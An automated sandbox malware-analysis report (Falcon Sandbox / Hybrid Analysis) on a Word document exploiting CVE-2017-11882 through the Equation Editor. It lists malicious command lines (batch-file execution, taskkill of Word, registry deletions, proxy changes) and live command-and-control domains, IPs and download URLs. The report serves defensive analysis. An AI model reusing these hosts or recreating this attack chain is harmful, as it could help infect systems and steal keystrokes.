Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for '5635DF453843.doc'

malicious

Threat Score: 100/100 AV Detection: 42% Labeled as: CVE-2017-11882

5635DF453843.doc

This report is generated from a file or URL submitted to this webservice on March 14th 2018 15:58:17 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v8.00 © Hybrid Analysis

Overview Sample unavailable Re-analyze Hash Seen Before Show Similar Samples Request Report Deletion

Incident Response

Risk Assessment

Spyware: Contains ability to open the clipboard
Contains ability to retrieve keyboard strokes
Persistence: Spawns a lot of processes
Network Behavior: Contacts 2 domains and 1 host. View all details

Additional Context

Related Sandbox Artifacts

Associated URLs: hxxp://172.81.183.180/Documents/Complaint/Id/5635DF453843.doc
hxxps://ibm-cert.com/Documents/Complaint/Id/5635DF453843.doc

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

Malicious Indicators 5
Exploit/Shellcode
- Possible document exploit detected
  
  details
  
  Document can spawn a new process although no macro was present in the original file
  
  source
  
  Indicator Combinations
  
  relevance
  
  10/10
General
- The analysis spawned a process that was identified as malicious
  
  details
  
  5/66 Antivirus vendors marked spawned process "exe.exe" (PID: 2300) as malicious (classified as "Kryptik.EDFO" with 7% detection rate)
  
  source
  
  Monitored Target
  
  relevance
  
  10/10
Network Related
- Malicious artifacts seen in the context of a contacted host
  
  details
  
  Found malicious artifacts related to "172.81.132.131": ...
  File SHA256: cd9572ab21bae521120a2a0f3bbfd8085512504a2ae9aa217db03164828117c7 (AV positives: 6/65 scanned on 03/14/2018 14:14:08)
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
Unusual Characteristics
- Document analysis contacts a domain
  
  details
  
  Often seen on documents with macro droppers
  embedded files or exploits
  
  source
  
  Indicator Combinations
  
  relevance
  
  3/10
- Spawns a lot of processes
  
  details
  
  Spawned process "WINWORD.EXE" with commandline "/n "C:\5635DF453843.doc"" (Show Process)
  Spawned process "cmd.exe" with commandline "/C %TEMP%\TaSk.BaT" (Show Process)
  Spawned process "cmd.exe" with commandline "/K %TEMP%\2nd.bat" (Show Process)
  Spawned process "timeout.exe" with commandline "TIMEOUT 1" (Show Process)
  Spawned process "cmd.exe" with commandline "/C %TEMP%\TaSk.BaT" (Show Process)
  Spawned process "EQNEDT32.EXE" with commandline "-Embedding" (Show Process)
  Spawned process "exe.exe" (Show Process)
  Spawned process "taskkill.exe" with commandline "taskkill /f /im WiNwOrD.ExE" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Resiliency /f" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Resiliency /f" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Resiliency /f" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Resiliency /f" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency /f" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency /f" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Resiliency /f" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency /f" (Show Process)
  Spawned process "cmd.exe" with commandline "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "reg.exe" with commandline "REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "cmd.exe" with commandline "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "reg.exe" with commandline "REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "cmd.exe" with commandline "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "reg.exe" with commandline "REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "cmd.exe" with commandline "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "reg.exe" with commandline "REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "cmd.exe" with commandline "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "reg.exe" with commandline "REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "cmd.exe" with commandline "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "reg.exe" with commandline "REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "cmd.exe" with commandline "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "reg.exe" with commandline "REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "cmd.exe" with commandline "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "reg.exe" with commandline "REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "WINWORD.EXE" with commandline "/n "%USERPROFILE%\Desktop\New Microsoft Word Document.docx"" (Show Process)
  Spawned process "DW20.EXE" with commandline "-x -s 1948" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  8/10

Suspicious Indicators 12
Anti-Detection/Stealthyness
- Terminates other processes using tskill/taskkill
  
  details
  
  Process "taskkill.exe" with commandline "taskkill /f /im WiNwOrD.ExE" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  9/10
Anti-Reverse Engineering
- Looks up many procedures within the same disassembly stream (often used to hide usage)
  
  details
  
  Found 10 calls to GetProcAddress@KERNEL32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  10/10
Environment Awareness
- Contains ability to measure performance
  
  details
  
  rdtsc from exe.exe (PID: 2300) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  10/10
External Systems
- Found an IP/URL artifact that was identified as malicious by at least one reputation engine
  
  details
  
  1/67 reputation engines marked "http://test1.ru/newbuild/t.php" as malicious (1% detection rate)
  
  source
  
  External System
  
  relevance
  
  10/10
General
- Contains ability to find and load resources of a specific module
  
  details
  
  FindResourceA@KERNEL32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  LockResource@KERNEL32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  FreeResource@KERNEL32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  LockResource@KERNEL32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  FindResourceA@KERNEL32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
- The analysis extracted a file that was identified as malicious
  
  details
  
  5/66 Antivirus vendors marked dropped file "exe.exe" as malicious (classified as "Kryptik.EDFO" with 7% detection rate)
  
  source
  
  Extracted File
  
  relevance
  
  10/10
Network Related
- Found potential IP address in binary/memory
  
  details
  
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 20:02:37"
  Heuristic match: "[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:59:16"
  Heuristic match: "[DoS Attack: TCP/UDP Chargen] from source: 184.105.139.117, port 15283, Tuesday, March 13, 2018 19:58:53"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:58:34"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:57:46"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:56:31"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:56:15"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:56:05"
  Heuristic match: "[DoS Attack: ARP Attack] from source: 30.49.48.1, Tuesday, March 13, 2018 19:54:47"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:53:49"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 37.182.9.32, port 80, Tuesday, March 13, 2018 19:53:06"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:50:46"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:44:59"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:44:57"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:42:40"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:42:23"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 37.182.9.32, port 80, Tuesday, March 13, 2018 19:40:07"
  Heuristic match: "[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:38:07"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:37:17"
  Heuristic match: "[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:36:40"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:32:40"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:32:32"
  Heuristic match: "[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:30:20"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:28:06"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:25:03"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:23:36"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 37.182.9.32, port 80, Tuesday, March 13, 2018 19:23:16"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:22:39"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:21:59"
  Heuristic match: "[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:21:07"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:16:07"
  Heuristic match: "[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:13:44"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:13:41"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:13:17"
  Heuristic match: "[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:11:29"
  Heuristic match: "[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:11:06"
  
  source
  
  String
  
  relevance
  
  3/10
Spyware/Information Retrieval
- Contains ability to open the clipboard
  
  details
  
  OpenClipboard@USER32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  OpenClipboard@USER32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  OpenClipboard@USER32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  OpenClipboard@USER32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  10/10
- Contains ability to retrieve keyboard strokes
  
  details
  
  GetAsyncKeyState@USER32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  8/10
System Security
- Modifies proxy settings
  
  details
  
  "exe.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
  "exe.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
  "exe.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
  "exe.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  "exe.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
- Tries to delete registry keys using reg.exe
  
  details
  
  Process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Resiliency /f" (Show Process)
  Process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Resiliency /f" (Show Process)
  Process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Resiliency /f" (Show Process)
  Process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Resiliency /f" (Show Process)
  Process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency /f" (Show Process)
  Process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency /f" (Show Process)
  Process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Resiliency /f" (Show Process)
  Process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency /f" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  5/10
Hiding 1 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version

Informative 25
Anti-Reverse Engineering
- Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
  
  details
  
  "cmd.exe" is protecting 8192 bytes with PAGE_GUARD access rights
  
  source
  
  API Call
  
  relevance
  
  10/10
Environment Awareness
- Contains ability to query machine time
  
  details
  
  GetLocalTime@KERNEL32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  GetSystemTime@KERNEL32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
- Contains ability to query the machine timezone
  
  details
  
  GetTimeZoneInformation@KERNEL32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  GetTimeZoneInformation@KERNEL32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
- Contains ability to query the machine version
  
  details
  
  GetVersion@KERNEL32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  GetVersion@KERNEL32.DLL from EQNEDT32.EXE (PID: 2012) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
- Makes a code branch decision directly after an API that is environment aware
  
  details
  
  Found API call GetVersion@KERNEL32.DLL (Target: "EQNEDT32.EXE"; Stream UID: "00018086-00002012-26210-733-0041264B")
  which is directly followed by "cmp eax, 04h" and "jl 0041277Eh". See related instructions: "...+214 call dword ptr [0046689Ch] ;GetVersion+220 mov dword ptr [ebp-0000008Ch], eax+226 mov eax, dword ptr [ebp-0000008Ch]+232 mov word ptr [ebp-00000090h], ax+239 movsx eax, word ptr [ebp-00000090h]+246 and eax, 0000FF00h+251 mov al, ah+253 mov ah, byte ptr [ebp-00000090h]+259 mov word ptr [0045BD72h], ax+265 mov word ptr [0045BD74h], 0000h+274 xor eax, eax+276 mov al, byte ptr [ebp-00000090h]+282 cmp eax, 04h+285 jl 0041277Eh" ... from EQNEDT32.EXE (PID: 2012) (Show Stream)
  Found API call GetSystemTime@KERNEL32.DLL (Target: "EQNEDT32.EXE"; Stream UID: "00018086-00002012-26210-1304-0044C230")
  which is directly followed by "cmp word ptr [esp+0Eh], cx" and "jne 0044C297h". See related instructions: "...+23 call dword ptr [00466814h] ;GetSystemTime+29 mov cx, word ptr [0045ACBAh]+36 cmp word ptr [esp+0Eh], cx+41 jne 0044C297h" ... from EQNEDT32.EXE (PID: 2012) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  10/10
Exploit/Shellcode
- Spawns the Microsoft Equation Editor
  
  details
  
  Process "EQNEDT32.EXE" with commandline "-Embedding" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  10/10
General
- Contacts domains
  
  details
  
  "test1.ru"
  "dns-verifon.com"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contacts server
  
  details
  
  "172.81.132.131:443"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Creates a writable file in a temporary directory
  
  details
  
  "WINWORD.EXE" created file "%TEMP%\decoy.doc"
  "WINWORD.EXE" created file "%TEMP%\task.bat"
  "WINWORD.EXE" created file "%TEMP%\exe.exe"
  "WINWORD.EXE" created file "%TEMP%\2nd.bat"
  "WINWORD.EXE" created file "%TEMP%\inteldriverupd1.sct"
  "WINWORD.EXE" created file "%TEMP%\4175349.cvr"
  "WINWORD.EXE" created file "%TEMP%\~DF3FD9C20F8C466B72.TMP"
  
  source
  
  API Call
  
  relevance
  
  1/10
- Creates mutants
  
  details
  
  "\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-59722"
  "\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-59722"
  "\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
  "\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "Local\c:!users!minzgs2!appdata!local!microsoft!windows!history!history.ie5!"
  "Global\552FFA80-3393-423d-8671-7BA046BB5906"
  "Local\c:!users!minzgs2!appdata!roaming!microsoft!windows!cookies!"
  "Local\ZonesCounterMutex"
  "Local\c:!users!minzgs2!appdata!roaming!microsoft!windows!ietldcache!"
  "Local\_!MSFTHISTORY!_"
  "Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "Local\10MU_ACBPIDS_S-1-5-5-0-59722"
  "Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "Local\ZoneAttributeCacheCounterMutex"
  "Local\10MU_ACB10_S-1-5-5-0-59722"
  
  source
  
  Created Mutant
  
  relevance
  
  3/10
- Drops files marked as clean
  
  details
  
  Antivirus vendors marked dropped file "inteldriverupd1.sct" as clean (type is "XML document ASCII text with CRLF line terminators")
  Antivirus vendors marked dropped file "~WRC0000.tmp" as clean (type is "Microsoft Word 2007+")
  
  source
  
  Extracted File
  
  relevance
  
  10/10
- Loads rich edit control libraries
  
  details
  
  "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6A530000
  
  source
  
  Loaded Module
- Process launched with changed environment
  
  details
  
  Process "cmd.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.CE4="4""
  Process "cmd.exe" (Show Process) was launched with new environment variables: "uu=""%TEMP%\block.txt" ""
  Process "timeout.exe" (Show Process) was launched with new environment variables: "uu=""C:\Users\%USERNAME%\AppData\Local\Temp\block.txt" ""
  Process "cmd.exe" (Show Process) was launched with missing environment variables: "uu"
  Process "EQNEDT32.EXE" (Show Process) was launched with missing environment variables: "uu"
  Process "taskkill.exe" (Show Process) was launched with new environment variables: "uu=""C:\Users\%USERNAME%\AppData\Local\Temp\block.txt" ""
  Process "cmd.exe" (Show Process) was launched with new environment variables: "AppPath="C:\Users\%USERNAME%\Desktop\New Microsoft Word Document.docx""
  Process "DW20.EXE" (Show Process) was launched with missing environment variables: "uu, AppPath"
  
  source
  
  Monitored Target
  
  relevance
  
  10/10
- Runs shell commands
  
  details
  
  "/C %TEMP%\TaSk.BaT" on 2018-3-14.08:01:30.156
  "/K %TEMP%\2nd.bat" on 2018-3-14.08:01:30.216
  "/C %TEMP%\TaSk.BaT" on 2018-3-14.08:01:30.316
  "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"" on 2018-3-14.08:01:32.690
  "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"" on 2018-3-14.08:01:32.870
  "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1"" on 2018-3-14.08:01:33.120
  "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1"" on 2018-3-14.08:01:33.281
  "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1"" on 2018-3-14.08:01:33.441
  "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1"" on 2018-3-14.08:02:13.631
  "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1"" on 2018-3-14.08:02:13.881
  "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1"" on 2018-3-14.08:02:14.082
  
  source
  
  Monitored Target
  
  relevance
  
  5/10
- Scanning for window names
  
  details
  
  "WINWORD.EXE" searching for class "mspim_wnd32"
  "WINWORD.EXE" searching for class "MSOBALLOON"
  "WINWORD.EXE" searching for class "MsoHelp10"
  "WINWORD.EXE" searching for class "AgentAnim"
  "WINWORD.EXE" searching for class "REListbox20W"
  "WINWORD.EXE" searching for class "OfficeTooltip"
  "WINWORD.EXE" searching for class "MsoCommandBarPopup"
  
  source
  
  API Call
  
  relevance
  
  10/10
- Spawns new processes
  
  details
  
  Spawned process "cmd.exe" with commandline "/C %TEMP%\TaSk.BaT" (Show Process)
  Spawned process "cmd.exe" with commandline "/K %TEMP%\2nd.bat" (Show Process)
  Spawned process "timeout.exe" with commandline "TIMEOUT 1" (Show Process)
  Spawned process "cmd.exe" with commandline "/C %TEMP%\TaSk.BaT" (Show Process)
  Spawned process "EQNEDT32.EXE" with commandline "-Embedding" (Show Process)
  Spawned process "exe.exe" (Show Process)
  Spawned process "taskkill.exe" with commandline "taskkill /f /im WiNwOrD.ExE" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Resiliency /f" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Resiliency /f" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Resiliency /f" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Resiliency /f" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency /f" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency /f" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Resiliency /f" (Show Process)
  Spawned process "reg.exe" with commandline "reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency /f" (Show Process)
  Spawned process "cmd.exe" with commandline "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "reg.exe" with commandline "REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "cmd.exe" with commandline "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "reg.exe" with commandline "REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"" (Show Process)
  Spawned process "cmd.exe" with commandline "/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1"" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  3/10
Installation/Persistance
- Creates new processes
  
  details
  
  "WINWORD.EXE" is creating a new process (Name: "%PROGRAMFILES%\COMMON~1\MICROS~1\DW\DW20.EXE", Handle: 1960)
  
  source
  
  API Call
  
  relevance
  
  8/10
- Dropped files
  
  details
  
  "5635DF453843.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Wed Mar 14 14:00:28 2018 mtime=Wed Mar 14 14:00:28 2018 atime=Wed Mar 14 14:00:37 2018 length=359569 window=hide"
  "New Microsoft Word Document.docx" has type "empty"
  "decoy.doc" has type "Composite Document File V2 Document Little Endian O%WINDIR%\Version 6.1 Code page: 1251 Author: Fiji Template: Normal.dotm Last Saved By: Fiji Revision Number: 17 Name of Creating Application: Microsoft Office Word Total Editing Time: 08:00 Create Time/Date: Sun Feb 25 20:18:00 2018 Last Saved Time/Date: Wed Mar 14 09:53:00 2018 Number of Pages: 2 Number of Words: 571 Number of Characters: 3255 Security: 0"
  "exe.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
  "task.bat" has type "ASCII text with CRLF line terminators"
  "inteldriverupd1.sct" has type "XML document ASCII text with CRLF line terminators"
  "2nd.bat" has type "ASCII text with CRLF line terminators"
  "~$35DF453843.doc" has type "data"
  "~WRS{9A8B9126-72CE-4F0C-9C8F-478613DB8E61}.tmp" has type "data"
  "index.dat" has type "data"
  "~WRS{7D260DD4-47A3-49BD-BA04-FB1EB18F2FF6}.tmp" has type "data"
  "~WRC0000.tmp" has type "Microsoft Word 2007+"
  "essxemdbwmsiaiagmfdi[1]" has type "data"
  "4175349.cvr" has type "data"
  "~WRS{E674B11D-078C-4013-8D68-BC57AFC19CCF}.tmp" has type "data"
  "~$Normal.dotm" has type "data"
  
  source
  
  Extracted File
  
  relevance
  
  3/10
- Drops executable files
  
  details
  
  "exe.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
  
  source
  
  Extracted File
  
  relevance
  
  10/10
- Opens the MountPointManager (often used to detect additional infection locations)
  
  details
  
  "WINWORD.EXE" opened "\Device\MountPointManager"
  
  source
  
  API Call
  
  relevance
  
  5/10
- Touches files in the Windows directory
  
  details
  
  "WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
  "WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
  "WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
  "WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
